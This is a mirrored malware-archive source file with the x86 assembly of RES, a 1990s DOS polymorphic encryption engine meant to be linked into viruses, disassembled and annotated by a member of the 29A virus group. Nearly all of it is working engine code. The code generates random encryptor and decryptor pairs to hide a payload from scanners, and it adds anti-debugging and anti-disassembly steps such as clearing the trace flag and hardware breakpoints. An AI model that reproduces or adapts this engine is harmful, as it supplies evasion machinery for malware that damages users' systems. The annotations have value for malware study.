mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 00:28:50 +00:00
459 lines
12 KiB
NASM
459 lines
12 KiB
NASM
|
; - -[RES.ASM]- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
|
|||
|
;
|
|||
|
; Random Encryption Synthezator (RES), by SSR
|
|||
|
; Disasm by Tcp/29A (tcp@cryogen.com)
|
|||
|
;
|
|||
|
;
|
|||
|
; Entry:
|
|||
|
; DS:DX = code
|
|||
|
; BX = runtime offset
|
|||
|
; CX = number of bytes to encrypt
|
|||
|
; Return:
|
|||
|
; DS:DX = encryptor+code
|
|||
|
; CX = size encryptor+code
|
|||
|
|
|||
|
|
|||
|
.386p
|
|||
|
RES segment use16
|
|||
|
assume cs:RES, ds:RES, es:RES, ss:RES
|
|||
|
org 0
|
|||
|
|
|||
|
RES_SIZE_DEC equ 300h ; But it only needs 169h
|
|||
|
|
|||
|
res_engine:
|
|||
|
start:
|
|||
|
call res_delta
|
|||
|
res_delta:
|
|||
|
pop si
|
|||
|
sub si,3 ; Get delta-offset
|
|||
|
pop ax
|
|||
|
push cs
|
|||
|
push ax
|
|||
|
push es
|
|||
|
mov ax,es
|
|||
|
sub ax,10h
|
|||
|
mov es,ax
|
|||
|
mov di,100h
|
|||
|
push cx
|
|||
|
mov cx,offset(end_res)
|
|||
|
nop
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
cld
|
|||
|
rep movsb ; Copy RES code to working area
|
|||
|
pop ds
|
|||
|
pop cx
|
|||
|
mov ax,offset(res_start+100h)
|
|||
|
push es
|
|||
|
push ax
|
|||
|
retf ; jmp res_start
|
|||
|
|
|||
|
res_start:
|
|||
|
pop es
|
|||
|
mov si,100h
|
|||
|
mov ax,es
|
|||
|
add ax,(end_res-start+15)/16+1
|
|||
|
mov es,ax ; Calculate base segment for decryptor
|
|||
|
mov cs:[si+runtime_ofs],bx
|
|||
|
mov cs:[si+code_length],cx
|
|||
|
push cx
|
|||
|
mov cx,RES_SIZE_DEC
|
|||
|
xor di,di
|
|||
|
mov al,90h ; NOP
|
|||
|
cld
|
|||
|
rep stosb ; Fill with NOPs
|
|||
|
call init_masks
|
|||
|
mov cx,8 ; 8 instructions per decryptor
|
|||
|
xor di,di
|
|||
|
add di,si
|
|||
|
l_select_instructions:
|
|||
|
push cx
|
|||
|
call RES_get_random
|
|||
|
mov ah,0
|
|||
|
push cx
|
|||
|
mov cl,5
|
|||
|
shr al,cl ; AX in [0..7]
|
|||
|
shl ax,1
|
|||
|
shl ax,1 ; AX:=AX*4 (4 bytes per instruction)
|
|||
|
pop cx
|
|||
|
push di
|
|||
|
push si
|
|||
|
add di,offset(buffer_decryptor)
|
|||
|
add si,offset(decryptor_table)
|
|||
|
add si,ax
|
|||
|
push ax
|
|||
|
mov ax,cs:[si] ; Select an instruction for decryptor
|
|||
|
mov cs:[di],ax ; and store it
|
|||
|
mov ax,cs:[si+2]
|
|||
|
mov cs:[di+2],ax
|
|||
|
pop ax
|
|||
|
pop si
|
|||
|
pop di
|
|||
|
push di
|
|||
|
push si
|
|||
|
add di,offset(buffer_encryptor)
|
|||
|
add si,offset(encryptor_table)
|
|||
|
add si,ax
|
|||
|
push ax
|
|||
|
mov ax,cs:[si] ; Select the instruction for encryptor
|
|||
|
mov cs:[di],ax ; and store it
|
|||
|
mov ax,cs:[si+2]
|
|||
|
mov cs:[di+2],ax
|
|||
|
pop ax
|
|||
|
pop si
|
|||
|
pop di
|
|||
|
add di,4
|
|||
|
pop cx
|
|||
|
loop l_select_instructions
|
|||
|
call reverse_decryptor_table
|
|||
|
call make_encryptor
|
|||
|
pop cx
|
|||
|
push cx
|
|||
|
mov bp,dx
|
|||
|
mov di,RES_SIZE_DEC
|
|||
|
mov cs:[si+code_CRC],0
|
|||
|
l_encrypt_code:
|
|||
|
mov al,ds:[bp]
|
|||
|
mov es:[di],al
|
|||
|
mov ah,0
|
|||
|
add cs:[si+code_CRC],ax ; Make code CRC
|
|||
|
|
|||
|
encryptor db 8*4 dup(90h) ; Buffer for encryptor
|
|||
|
|
|||
|
inc di
|
|||
|
inc bp
|
|||
|
loop l_encrypt_code
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
xor di,di
|
|||
|
push si
|
|||
|
add si,offset(decryptor_code)
|
|||
|
mov cx,decrypted_code-decryptor_code
|
|||
|
nop
|
|||
|
cld
|
|||
|
rep movsb ; Copy decryptor to buffer
|
|||
|
pop si
|
|||
|
pop ds
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
xor dx,dx ; DS:DX = Address of decryptor+code
|
|||
|
pop cx
|
|||
|
add cx,RES_SIZE_DEC ; Decryptor+encrypted code
|
|||
|
retf
|
|||
|
|
|||
|
db 0
|
|||
|
db 'RandomEncryptionSynthezator',0
|
|||
|
db '<27> S.S.R. 1996-97',0
|
|||
|
|
|||
|
init_masks:
|
|||
|
push si
|
|||
|
mov cx,3 ; Only first 3 instructions need a mask
|
|||
|
l_next_mask:
|
|||
|
call RES_get_random
|
|||
|
mov byte ptr cs:[si+decryptor_table+3],al ; Store mask
|
|||
|
mov byte ptr cs:[si+encryptor_table+3],al
|
|||
|
add si,4 ; Next inst.
|
|||
|
loop l_next_mask
|
|||
|
pop si
|
|||
|
ret
|
|||
|
|
|||
|
RES_get_random:
|
|||
|
pushf
|
|||
|
in al,40h ; Get random number
|
|||
|
ror al,1
|
|||
|
xor al,53h
|
|||
|
popf
|
|||
|
ret
|
|||
|
|
|||
|
make_encryptor:
|
|||
|
push es
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
push si
|
|||
|
in al,40h ; Get random number
|
|||
|
mov cx,8
|
|||
|
mov di,offset(encryptor)
|
|||
|
add di,si
|
|||
|
add si,offset(buffer_encryptor)
|
|||
|
l_make_encryptor:
|
|||
|
rcr al,1 ; Add instruction to encryptor?
|
|||
|
jc add_instruction ; Yes? then jmp
|
|||
|
nop
|
|||
|
nop
|
|||
|
add si,4
|
|||
|
loop_make_encryptor:
|
|||
|
loop l_make_encryptor
|
|||
|
jmp encryptor_done
|
|||
|
nop
|
|||
|
|
|||
|
add_instruction:
|
|||
|
cld
|
|||
|
push cx
|
|||
|
mov cx,4
|
|||
|
rep movsb ; Store instruction
|
|||
|
pop cx
|
|||
|
jmp loop_make_encryptor
|
|||
|
|
|||
|
encryptor_done:
|
|||
|
pop si
|
|||
|
pop ds
|
|||
|
pop es
|
|||
|
ret
|
|||
|
|
|||
|
reverse_decryptor_table:
|
|||
|
push ax
|
|||
|
push bp
|
|||
|
push di
|
|||
|
push cx
|
|||
|
push bx
|
|||
|
mov cx,8/2
|
|||
|
mov di,offset(buffer_decryptor)
|
|||
|
add di,si
|
|||
|
mov bp,offset(end_buffer_dec)-4 ; Point to last inst.
|
|||
|
add bp,si
|
|||
|
l_reverse_table:
|
|||
|
mov ax,cs:[di] ; Xchg instructions
|
|||
|
mov bx,cs:[bp]
|
|||
|
mov cs:[di],bx
|
|||
|
mov cs:[bp],ax
|
|||
|
mov ax,cs:[di+2]
|
|||
|
mov bx,cs:[bp+2]
|
|||
|
mov cs:[di+2],bx
|
|||
|
mov cs:[bp+2],ax
|
|||
|
sub bp,4 ; xchg next instruction
|
|||
|
add di,4
|
|||
|
loop l_reverse_table
|
|||
|
pop bx
|
|||
|
pop cx
|
|||
|
pop di
|
|||
|
pop bp
|
|||
|
pop ax
|
|||
|
ret
|
|||
|
|
|||
|
db 4 ; Unused !!
|
|||
|
|
|||
|
decryptor_code:
|
|||
|
runtime_ofs equ word ptr $+1
|
|||
|
mov bp,0 ; mov bp,runtime_ofs
|
|||
|
push 1100h+(90h+3Ch-20h)
|
|||
|
sub bp,offset(decryptor_code)
|
|||
|
mov di,offset(decryptor)
|
|||
|
add di,bp
|
|||
|
pop ax ; AX:=1100h+(90h+3Ch-20h)
|
|||
|
inc cs:[bp+n_decryptors] ; Inc # of tested decryptors
|
|||
|
mov cs:[bp+decryptor_ok],0 ; Decryptor not found
|
|||
|
mov cs:[bp+decrypting],0 ; Not decrypting
|
|||
|
mov cx,20h
|
|||
|
push es
|
|||
|
push ds
|
|||
|
add ax,cx
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
cld
|
|||
|
dec cx
|
|||
|
sub al,3Ch ; AL:=90h (NOP)
|
|||
|
rep stosb
|
|||
|
add al,3Ch ; AL:=0CCh (int 3)
|
|||
|
stosb
|
|||
|
cmp cs:[bp+n_decryptors],150 ; < 150 decryptors tested?
|
|||
|
jb create_random_decryptor ; Yes? then jmp
|
|||
|
nop
|
|||
|
nop
|
|||
|
mov ax,cs:[bp+n_decryptors] ; Don't use a random number.
|
|||
|
; n_decryptors will be increased, so it'll
|
|||
|
; find the correct decryptor.
|
|||
|
jmp create_decryptor
|
|||
|
nop
|
|||
|
|
|||
|
db 66h ; Unused!? (antidebug??)
|
|||
|
|
|||
|
create_random_decryptor:
|
|||
|
in al,40h ; Get random number
|
|||
|
create_decryptor:
|
|||
|
mov cs:[bp+decryptor_id],al ; Why? Never use it!!
|
|||
|
mov cx,8
|
|||
|
mov si,offset(buffer_decryptor)
|
|||
|
add si,bp
|
|||
|
mov di,offset(decryptor)
|
|||
|
add di,bp
|
|||
|
l_make_random_decryptor:
|
|||
|
rcr al,1 ; Add instruction to decryptor?
|
|||
|
jc add_inst_dec ; Yes? then jmp
|
|||
|
nop
|
|||
|
nop
|
|||
|
add si,4
|
|||
|
next_dec_instruction:
|
|||
|
loop l_make_random_decryptor
|
|||
|
jmp done_random_decryptor
|
|||
|
nop
|
|||
|
|
|||
|
add_inst_dec:
|
|||
|
cld
|
|||
|
push cx
|
|||
|
mov cx,4
|
|||
|
rep movsb ; Add instruction
|
|||
|
pop cx
|
|||
|
jmp next_dec_instruction
|
|||
|
|
|||
|
done_random_decryptor:
|
|||
|
mov di,RES_SIZE_DEC
|
|||
|
add di,cs:[bp+runtime_ofs]
|
|||
|
code_length equ word ptr $+1
|
|||
|
mov cx,0 ; mov cx,code_length
|
|||
|
mov bx,cs:[bp+code_CRC]
|
|||
|
l_random_decryptor:
|
|||
|
mov dl,cs:[di]
|
|||
|
|
|||
|
decryptor db 8*4 dup(90h)
|
|||
|
|
|||
|
mov al,dl
|
|||
|
mov ah,0
|
|||
|
sub bx,ax ; Calculate CRC
|
|||
|
cmp cs:[bp+decrypting],1 ; Decrypting?
|
|||
|
je decrypt_byte ; Yes? then jmp
|
|||
|
nop
|
|||
|
nop
|
|||
|
loop_decryptor:
|
|||
|
inc di
|
|||
|
loop l_random_decryptor
|
|||
|
pop ds
|
|||
|
pop es
|
|||
|
cmp bx,0 ; CRC OK?
|
|||
|
jnz decryptor_code ; No? then jmp
|
|||
|
jmp found_decryptor ; Yes? then jmp
|
|||
|
nop
|
|||
|
|
|||
|
buffer_decryptor db 8*4 dup(90h)
|
|||
|
end_buffer_dec:
|
|||
|
|
|||
|
code_CRC dw 0
|
|||
|
decryptor_ok db 0
|
|||
|
decrypting db 0
|
|||
|
db 0Bh ; Unused!
|
|||
|
db 0Bh ; Unused!
|
|||
|
db 0Bh ; Unused!
|
|||
|
decryptor_id db 0
|
|||
|
n_decryptors dw 0
|
|||
|
|
|||
|
decrypt_byte:
|
|||
|
mov cs:[di],dl ; Store decrypted byte
|
|||
|
jmp loop_decryptor
|
|||
|
|
|||
|
found_decryptor:
|
|||
|
cmp cs:[bp+decryptor_ok],1 ; Code decrypted?
|
|||
|
je code_decrypted ; Yes? then jmp
|
|||
|
nop
|
|||
|
nop
|
|||
|
mov cs:[bp+decrypting],1
|
|||
|
mov cs:[bp+decryptor_ok],1
|
|||
|
push es
|
|||
|
push ds
|
|||
|
jmp done_random_decryptor ; Decrypt code
|
|||
|
|
|||
|
code_decrypted:
|
|||
|
jmp anti_disasm1
|
|||
|
nop
|
|||
|
db 69h ; Antidebug
|
|||
|
anti_disasm1:
|
|||
|
cli
|
|||
|
push 3545h
|
|||
|
jmp anti_disasm2
|
|||
|
nop
|
|||
|
db 0EAh ; Antidebug
|
|||
|
anti_disasm2:
|
|||
|
cli
|
|||
|
inc sp
|
|||
|
mov ax,cs:[bp]
|
|||
|
xor ax,bx
|
|||
|
cld
|
|||
|
scasb
|
|||
|
inc sp
|
|||
|
mov ax,4202h
|
|||
|
sub sp,2
|
|||
|
pop ax
|
|||
|
cmp ax,3545h ; Is it being traced?
|
|||
|
jne decrypted_code ; Yes? then jmp
|
|||
|
; BUG! Should jump when not traced
|
|||
|
nop
|
|||
|
nop
|
|||
|
xor ax,3445h
|
|||
|
mov es,ax
|
|||
|
inc byte ptr cs:[0Dh]
|
|||
|
and cx,0Fh
|
|||
|
rep scasb
|
|||
|
xor ax,cs:[si]
|
|||
|
pushf
|
|||
|
pop ax ; Get flags
|
|||
|
and ah,0FEh ; Clear trace flag
|
|||
|
push ax
|
|||
|
xchg bx,cx
|
|||
|
les bx,ds:[2Bh]
|
|||
|
popf ; Trace flag off
|
|||
|
xor eax,eax
|
|||
|
mov dr7,eax ; Clear all breakpoints
|
|||
|
dec byte ptr cs:[0Dh]
|
|||
|
call skip_reset
|
|||
|
db 0EAh ; jmp far ptr 0F000h:0FFF0h (reset)
|
|||
|
dw 0FFF0h ; but never reach here because in 'skip_reset'
|
|||
|
dw 0F000h ; it does a pop of the return address
|
|||
|
|
|||
|
skip_reset:
|
|||
|
pop ax
|
|||
|
decrypted_code: ; End of decryptor code
|
|||
|
|
|||
|
encryptor_table:
|
|||
|
xor byte ptr es:[di],0
|
|||
|
add byte ptr es:[di],0
|
|||
|
sub byte ptr es:[di],0
|
|||
|
nop
|
|||
|
ror byte ptr es:[di],1
|
|||
|
nop
|
|||
|
rol byte ptr es:[di],1
|
|||
|
nop
|
|||
|
neg byte ptr es:[di]
|
|||
|
nop
|
|||
|
not byte ptr es:[di]
|
|||
|
nop
|
|||
|
neg byte ptr es:[di]
|
|||
|
|
|||
|
decryptor_table:
|
|||
|
nop
|
|||
|
xor dl,0
|
|||
|
nop
|
|||
|
sub dl,0
|
|||
|
nop
|
|||
|
add dl,0
|
|||
|
nop
|
|||
|
nop
|
|||
|
rol dl,1
|
|||
|
nop
|
|||
|
nop
|
|||
|
ror dl,1
|
|||
|
nop
|
|||
|
nop
|
|||
|
neg dl
|
|||
|
nop
|
|||
|
nop
|
|||
|
not dl
|
|||
|
nop
|
|||
|
nop
|
|||
|
neg dl
|
|||
|
|
|||
|
buffer_encryptor db 8*4 dup(90h)
|
|||
|
|
|||
|
end_res:
|
|||
|
|
|||
|
RES ends
|
|||
|
public res_engine
|
|||
|
end
|
|||
|
|
|||
|
; End of RES disasm
|
|||
|
; (c) 1997, Tcp/29A (tcp@cryogen.com)
|